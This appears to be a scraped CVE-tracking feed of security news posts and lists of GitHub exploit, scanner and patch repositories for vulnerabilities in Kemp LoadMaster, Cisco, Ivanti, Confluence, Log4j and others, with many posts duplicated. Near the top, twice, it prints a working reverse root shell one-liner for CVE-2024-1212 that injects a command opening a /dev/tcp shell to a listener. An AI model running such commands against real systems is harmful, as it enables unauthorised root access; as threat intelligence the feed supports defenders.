Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##CVE-2024-1212 reverse root shell:
curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##CVE-2024-1212 reverse root shell:
curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' vulncheck.com #:"
updated 2024-02-16T02:00:03.227000
2 posts
In light of recent events, probably best to make this ASA vuln public in public interest: https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.
The path exists even with webvpn disabled, it's the host checker.
Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen
Akira and others have been living off this for a while.
##In light of recent events, probably best to make this ASA vuln public in public interest: https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
If you get <argument> back with toke inside, not vuln. If you get a memory dump back, you vuln. The dump is pretty bad as it contains a bunch of stuff.
The path exists even with webvpn disabled, it's the host checker.
Credits to person who found it, don't know if they want to be named. Edit: it’s @Naproxen
Akira and others have been living off this for a while.
##updated 2024-02-09T21:53:15
2 posts
1 repos
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##updated 2024-02-03T05:07:29
2 posts
28 repos
https://github.com/ZephrFish/CVE-2023-20198-Checker
https://github.com/ohlawd/CVE-2023-20198
https://github.com/raystr-atearedteam/CVE-2023-20198-checker
https://github.com/securityphoenix/cisco-CVE-2023-20198-tester
https://github.com/Vulnmachines/Cisco_CVE-2023-20198
https://github.com/smokeintheshell/CVE-2023-20198
https://github.com/sohaibeb/CVE-2023-20198
https://github.com/iveresk/cve-2023-20198
https://github.com/Atea-Redteam/CVE-2023-20198
https://github.com/alekos3/CVE_2023_20198_Remediator
https://github.com/Pushkarup/CVE-2023-20198
https://github.com/W01fh4cker/CVE-2023-20198-RCE
https://github.com/Codeb3af/CVE-2023-20198-RCE
https://github.com/kacem-expereo/CVE-2023-20198
https://github.com/RevoltSecurities/CVE-2023-20198
https://github.com/reket99/Cisco_CVE-2023-20198
https://github.com/vulncheck-oss/cisco-ios-xe-implant-scanner
https://github.com/netbell/CVE-2023-20198-Fix
https://github.com/hackingyseguridad/nmap
https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
https://github.com/JoyGhoshs/CVE-2023-20198
https://github.com/fox-it/cisco-ios-xe-implant-detection
https://github.com/codeb0ss/CVE-2023-20198-PoC
https://github.com/alekos3/CVE_2023_20198_Detector
https://github.com/Tounsi007/CVE-2023-20198
https://github.com/IceBreakerCode/CVE-2023-20198
https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198
🚨EXPLOIT POC🚨PoC for CVE-2023-20198 Cisco IOS XE RCE and query released by @W01fh4cker.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Cisco #Infosec #CTI #CVE202320198 #Vulnerability
GitHub: https://github.com/W01fh4cker/CVE-2023-20198-RCE
X Link: https://twitter.com/DarkWebInformer/status/1784360877132525857
##🚨EXPLOIT POC🚨PoC for CVE-2023-20198 Cisco IOS XE RCE and query released by @W01fh4cker.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Cisco #Infosec #CTI #CVE202320198 #Vulnerability
GitHub: https://github.com/W01fh4cker/CVE-2023-20198-RCE
X Link: https://twitter.com/DarkWebInformer/status/1784360877132525857
##updated 2024-02-02T18:30:29
2 posts
6 repos
https://github.com/adminlove520/CVE-2024-0204
https://github.com/gobysec/GobyVuls
https://github.com/cbeek-r7/CVE-2024-0204
https://github.com/gobysec/Goby
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##updated 2024-01-31T05:07:17
2 posts
8 repos
https://github.com/yoryio/CVE-2023-46805
https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887
https://github.com/Chocapikk/CVE-2023-46805
https://github.com/seajaysec/Ivanti-Connect-Around-Scan
https://github.com/cbeek-r7/CVE-2023-46805
https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped
MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 https://www.mitre.org/news-insights/news-release/mitre-response-cyber-attack-one-its-rd-networks and https://medium.com/mitre-engenuity/advanced-cyber-threats-impact-even-the-most-prepared-56444e980dc8 h/t @reverseics
#MITRE #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #threatintel #cyberespionage
##MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 https://www.mitre.org/news-insights/news-release/mitre-response-cyber-attack-one-its-rd-networks and https://medium.com/mitre-engenuity/advanced-cyber-threats-impact-even-the-most-prepared-56444e980dc8 h/t @reverseics
#MITRE #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #threatintel #cyberespionage
##updated 2024-01-22T18:31:16
2 posts
12 repos
https://github.com/oways/ivanti-CVE-2024-21887
https://github.com/yoryio/CVE-2023-46805
https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887
https://github.com/seajaysec/Ivanti-Connect-Around-Scan
https://github.com/gobysec/GobyVuls
https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped
https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887
https://github.com/imhunterand/CVE-2024-21887
https://github.com/gobysec/Goby
MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 https://www.mitre.org/news-insights/news-release/mitre-response-cyber-attack-one-its-rd-networks and https://medium.com/mitre-engenuity/advanced-cyber-threats-impact-even-the-most-prepared-56444e980dc8 h/t @reverseics
#MITRE #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #threatintel #cyberespionage
##MITRE disclosed that one of their research and development networks was compromised by a foreign nation-state threat actor in January 2024 using Ivanti Connect Secure zero-days CVE-2023-46805 and CVE-2024-21887. Networked Experimentation, Research, and Virtualization Environment (NERVE) is a collaborative network used for research, development, and prototyping. MITRE included a timeline, observed TTP methods (mapped out to MITRE ATT&CK techniques cc: @howelloneill) and their incident response actions. No IOC provided. 🔗 https://www.mitre.org/news-insights/news-release/mitre-response-cyber-attack-one-its-rd-networks and https://medium.com/mitre-engenuity/advanced-cyber-threats-impact-even-the-most-prepared-56444e980dc8 h/t @reverseics
#MITRE #Ivanti #ConnectSecure #CVE_2023_46805 #CVE_2024_21887 #threatintel #cyberespionage
##updated 2023-12-28T05:05:44
2 posts
8 repos
https://github.com/davidfortytwo/CVE-2023-22518
https://github.com/0x0d3ad/CVE-2023-22518
https://github.com/bibo318/CVE-2023-22518
https://github.com/Lilly-dox/Exploit-CVE-2023-22518
https://github.com/C1ph3rX13/CVE-2023-22518
https://github.com/RevoltSecurities/CVE-2023-22518
Cado Security Labs reports that threat actors are exploiting CVE-2023-22518 (9.8 critical, disclosed 31 October 2023 by Atlassian, in CISA KEV Catalog 07 November 2023) in Atlassian Confluence to deploy Cerber ransomware. Cado provides a technical analysis of the Linux variant of Cerber. IOC provided. 🔗 https://www.cadosecurity.com/blog/cerber-ransomware-dissecting-the-three-heads
##The attacks leverage CVE-2023-22518 (CVSS score: 9.1), a critical security vulnerability impacting the Atlassian Confluence Data Center and Server that allows an unauthenticated attacker to reset Confluence and create an administrator account. https://thehackernews.com/2024/04/critical-atlassian-flaw-exploited-to.html?_m=3n%2e009a%2e3332%2ebk0aof3yrl%2e2c2c
##updated 2023-12-08T05:05:23
2 posts
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2023-12-06T03:30:26
5 posts
SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
#CVE-2023-4473 #CVE-2023-4474
https://isc.sans.edu/diary/rss/30884
Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##updated 2023-12-06T03:30:26
5 posts
SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##SANS ISC: Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
@jullrich of SANS ISC warns of 89.190.156.248 scanning for and attempting to exploit Zyxel NAS326 vulnerabilities CVE-2023-4473 and CVE-2023-4474 (both 9.8 critical, disclosed 29 November 2023) to download and execute the "amanas2" binary and execute it.
#threatintel #CVE_2023_4473 #CVE_2023_4474 #activeexploitation #eitw #Zyxel #vulnerability #IOC
##Another Day, Another NAS: Attacks against Zyxel NAS326 devices CVE-2023-4473, CVE-2023-4474
#CVE-2023-4473 #CVE-2023-4474
https://isc.sans.edu/diary/rss/30884
Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##Another Day, Another NAS: Attacks against #Zyxel #NAS326 devices CVE-2023-4473, CVE-2023-4474 https://i5c.us/d30884
##updated 2023-11-14T18:30:29
2 posts
SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##updated 2023-11-07T03:39:36.897000
2 posts
100 repos
https://github.com/darkarnium/Log4j-CVE-Detect
https://github.com/fullhunt/log4j-scan
https://github.com/puzzlepeaches/Log4jUnifi
https://github.com/future-client/CVE-2021-44228
https://github.com/mr-vill4in/log4j-fuzzer
https://github.com/NCSC-NL/log4shell
https://github.com/corelight/cve-2021-44228
https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator
https://github.com/blake-fm/vcenter-log4j
https://github.com/momos1337/Log4j-RCE
https://github.com/mufeedvh/log4jail
https://github.com/NS-Sp4ce/Vm4J
https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept
https://github.com/wortell/log4j
https://github.com/roxas-tan/CVE-2021-44228
https://github.com/kubearmor/log4j-CVE-2021-44228
https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell
https://github.com/DragonSurvivalEU/RCE
https://github.com/Diverto/nse-log4shell
https://github.com/yahoo/check-log4j
https://github.com/0xDexter0us/Log4J-Scanner
https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads
https://github.com/HynekPetrak/log4shell-finder
https://github.com/AlexandreHeroux/Fix-CVE-2021-44228
https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228
https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
https://github.com/toramanemre/log4j-rce-detect-waf-bypass
https://github.com/alexandre-lavoie/python-log4rce
https://github.com/alexbakker/log4shell-tools
https://github.com/kozmer/log4j-shell-poc
https://github.com/Adikso/minecraft-log4j-honeypot
https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228
https://github.com/jas502n/Log4j2-CVE-2021-44228
https://github.com/Jeromeyoung/log4j2burpscanner
https://github.com/claranet/ansible-role-log4shell
https://github.com/KosmX/CVE-2021-44228-example
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
https://github.com/CERTCC/CVE-2021-44228_scanner
https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP
https://github.com/logpresso/CVE-2021-44228-Scanner
https://github.com/mzlogin/CVE-2021-44228-Demo
https://github.com/takito1812/log4j-detect
https://github.com/dtact/divd-2021-00038--log4j-scanner
https://github.com/MalwareTech/Log4jTools
https://github.com/1lann/log4shelldetect
https://github.com/qingtengyun/cve-2021-44228-qingteng-patch
https://github.com/thomaspatzke/Log4Pot
https://github.com/bigsizeme/Log4j-check
https://github.com/BinaryDefense/log4j-honeypot-flask
https://github.com/f0ng/log4j2burpscanner
https://github.com/julian911015/Log4j-Scanner-Exploit
https://github.com/hackinghippo/log4shell_ioc_ips
https://github.com/leonjza/log4jpwn
https://github.com/mr-r3b00t/CVE-2021-44228
https://github.com/corretto/hotpatch-for-apache-log4j2
https://github.com/Nanitor/log4fix
https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab
https://github.com/sassoftware/loguccino
https://github.com/christophetd/log4shell-vulnerable-app
https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent
https://github.com/0xInfection/LogMePwn
https://github.com/rubo77/log4j_checker_beta
https://github.com/marcourbano/CVE-2021-44228
https://github.com/thecyberneh/Log4j-RCE-Exploiter
https://github.com/pedrohavay/exploit-CVE-2021-44228
https://github.com/nccgroup/log4j-jndi-be-gone
https://github.com/CreeperHost/Log4jPatcher
https://github.com/cyberxml/log4j-poc
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
https://github.com/lucab85/log4j-cve-2021-44228
https://github.com/phoswald/sample-ldap-exploit
https://github.com/tippexs/nginx-njs-waf-cve2021-44228
https://github.com/dwisiswant0/look4jar
https://github.com/NorthwaveSecurity/log4jcheck
https://github.com/boundaryx/cloudrasp-log4j2
https://github.com/redhuntlabs/Log4JHunt
https://github.com/puzzlepeaches/Log4jCenter
https://github.com/mergebase/log4j-detector
https://github.com/JagarYousef/log4j-dork-scanner
https://github.com/ssl/scan4log4j
https://github.com/fox-it/log4j-finder
https://github.com/simonis/Log4jPatch
https://github.com/infiniroot/nginx-mitigate-log4shell
https://github.com/lfama/log4j_checker
https://github.com/back2root/log4shell-rex
https://github.com/giterlizzi/nmap-log4shell
https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228
https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector
https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
https://github.com/stripe/log4j-remediation-tools
https://github.com/fireeye/CVE-2021-44228
https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch
https://github.com/justakazh/Log4j-CVE-2021-44228
https://github.com/LiveOverflow/log4shell
https://github.com/0xst4n/CVE-2021-44228-poc
https://github.com/cisagov/log4j-scanner
https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
https://github.com/greymd/CVE-2021-44228
SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.
#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975
##updated 2023-11-06T05:04:16
2 posts
3 repos
https://github.com/RubyCat1337/CVE-2023-30943
Kaspersky, not content with only the technical analysis of the XZ Utils backdoor, covers the social engineering techniques and timeline of the threat actor who used the alias Jia Tan. 🔗 https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/ See related Kaspersky technical analysis https://securelist.com/xz-backdoor-story-part-1/112354/
##Kaspersky, not content with only the technical analysis of the XZ Utils backdoor, covers the social engineering techniques and timeline of the threat actor who used the alias Jia Tan. 🔗 https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/ See related Kaspersky technical analysis https://securelist.com/xz-backdoor-story-part-1/112354/
##updated 2023-10-03T15:44:06.660000
2 posts
7 repos
https://github.com/Zyad-Elsayed/CVE-2023-42793
https://github.com/hotplugin0x01/CVE-2023-42793
https://github.com/H454NSec/CVE-2023-42793
https://github.com/johnossawy/CVE-2023-42793_POC
https://github.com/StanleyJobsonAU/GhostTown
More concerning still, our investigators found evidence that a similar chain of movements has also been used against an earlier TeamCity authentication-bypass vulnerability – CVE-2023-42793, disclosed and patched in September 2023. That CVE affected on-prem versions prior to 2023.05.4; the company released a patch in that version, and also offered a plug-in for users of older versions of the product. (As a reminder, TeamCity’s latest version is 2024.03; among the many new features is automatic download of critical security updates, though an admin will still need to approve installation.)
##More concerning still, our investigators found evidence that a similar chain of movements has also been used against an earlier TeamCity authentication-bypass vulnerability – CVE-2023-42793, disclosed and patched in September 2023. That CVE affected on-prem versions prior to 2023.05.4; the company released a patch in that version, and also offered a plug-in for users of older versions of the product. (As a reminder, TeamCity’s latest version is 2024.03; among the many new features is automatic download of critical security updates, though an admin will still need to approve installation.)
##updated 2023-08-17T05:02:52
4 posts
12 repos
https://github.com/hi-artem/find-spooky-prismacloud
https://github.com/eatscrayon/CVE-2022-3602-poc
https://github.com/corelight/CVE-2022-3602
https://github.com/NCSC-NL/OpenSSL-2022
https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786
https://github.com/micr0sh0ft/certscare-openssl3-exploit
https://github.com/attilaszia/cve-2022-3602
https://github.com/Qualys/osslscanwin
https://github.com/colmmacc/CVE-2022-3602
https://github.com/alicangnll/SpookySSL-Scanner
https://github.com/fox-it/spookyssl-pcaps
https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc
🔍 Why did CVE-2022-3602 evade fuzz testing? A deep dive into OpenSSL's fuzzing fails: The punycode parser slipped through due to specific harness limitations & lack of corpus coverage. A call for enhanced fuzzing strategies! #CyberSecurity #OpenSSL #CVE http://allsoftwaresucks.blogspot.com/2022/11/why-cve-2022-3602-was-not-detected-by.html
##Why CVE-2022-3602 was not detected by fuzz testing - http://allsoftwaresucks.blogspot.com/2022/11/why-cve-2022-3602-was-not-detected-by.html
##Why CVE-2022-3602 was not detected by fuzz testing
http://allsoftwaresucks.blogspot.com/2022/11/why-cve-2022-3602-was-not-detected-by.html
posted by #technewz_bot #tech #news
Why CVE-2022-3602 was not detected by fuzz testing
http://allsoftwaresucks.blogspot.com/2022/11/why-cve-2022-3602-was-not-detected-by.html
posted by #technewz_bot #tech #news
updated 2023-08-11T15:30:44
3 posts
2 repos
@hrbrmstr Oh the Tuesday blog post. Here's a direct link to Fortinet's: https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
##@hrbrmstr Oh the Tuesday blog post. Here's a direct link to Fortinet's: https://www.fortinet.com/blog/threat-research/botnets-continue-exploiting-cve-2023-1389-for-wide-scale-spread
##There already is a patch for the flaw, tracked as CVE-2023-1389, found in the Web management interface of the TP-Link Archer AX21 (AX1800) Wi-Fi router and affecting devices Version 1.1.4 Build 20230219 or prior. https://www.darkreading.com/ics-ot-security/various-botnets-pummel-tp-link-flaw-iot-attacks
##updated 2023-05-15T18:18:30.897000
2 posts
1 repos
At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".
All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.
@Rairii called it in Feb with analysis of securebootai.dll
##At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".
All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.
@Rairii called it in Feb with analysis of securebootai.dll
##updated 2023-05-06T05:00:40
2 posts
1 repos
https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746
LocalPotato HTTP edition
Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...
🔗️ [Decoder] https://link.is.it/ikv1ph
##LocalPotato HTTP edition
Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP...
🔗️ [Decoder] https://link.is.it/ikv1ph
##updated 2023-04-19T05:08:54
2 posts
EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955
Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...
🔗️ [Decoder] https://link.is.it/wewm9y
##EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955
Summary A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy...
🔗️ [Decoder] https://link.is.it/wewm9y
##updated 2023-04-06T05:08:38
1 posts
6 repos
https://github.com/L1-0/codestuff
https://github.com/qixils/AntiCropalypse
https://github.com/infobyte/CVE-2023-21036
https://github.com/lordofpipes/acropadetect
https://github.com/notaSWE/gocropalypse
https://github.com/frankthetank-music/Acropalypse-Multi-Tool
@sonia_seddiki explaining the aCropalypse vulnerability in PNG files, at @devoxxfr
Scary 😱
https://www.devoxx.fr/schedule/talk/?id=50194
https://en.wikipedia.org/wiki/ACropalypse
https://www.cve.org/CVERecord?id=CVE-2023-21036
updated 2023-02-18T05:04:47
2 posts
65 repos
https://github.com/hybridus/heartbleedscanner
https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed
https://github.com/cheese-hub/heartbleed
https://github.com/BelminD/heartbleed
https://github.com/wwwiretap/bleeding_onions
https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS
https://github.com/GeeksXtreme/ssl-heartbleed.nse
https://github.com/jdauphant/patch-openssl-CVE-2014-0160
https://github.com/DominikTo/bleed
https://github.com/obayesshelton/CVE-2014-0160-Scanner
https://github.com/a0726h77/heartbleed-test
https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin
https://github.com/undacmic/heartbleed-proof-of-concept
https://github.com/zouguangxian/heartbleed
https://github.com/yryz/heartbleed.js
https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin
https://github.com/pierceoneill/bleeding-heart
https://github.com/indiw0rm/-Heartbleed-
https://github.com/timsonner/cve-2014-0160-heartbleed
https://github.com/vortextube/ssl_scanner
https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx
https://github.com/cldme/heartbleed-bug
https://github.com/ThanHuuTuan/Heartexploit
https://github.com/Saymeis/HeartBleed
https://github.com/idkqh7/heatbleeding
https://github.com/einaros/heartbleed-tools
https://github.com/cved-sources/cve-2014-0160
https://github.com/iwaffles/heartbleed-test.crx
https://github.com/pblittle/aws-suture
https://github.com/GardeniaWhite/fuzzing
https://github.com/PinkP4nther/Heartbleed_PoC
https://github.com/musalbas/heartbleed-masstest
https://github.com/OffensivePython/HeartLeak
https://github.com/cbk914/heartbleed-checker
https://github.com/ingochris/heartpatch.us
https://github.com/rouze-d/heartbleed
https://github.com/Lekensteyn/pacemaker
https://github.com/xanas/heartbleed.py
https://github.com/proactiveRISK/heartbleed-extention
https://github.com/titanous/heartbleeder
https://github.com/GuillermoEscobero/heartbleed
https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker
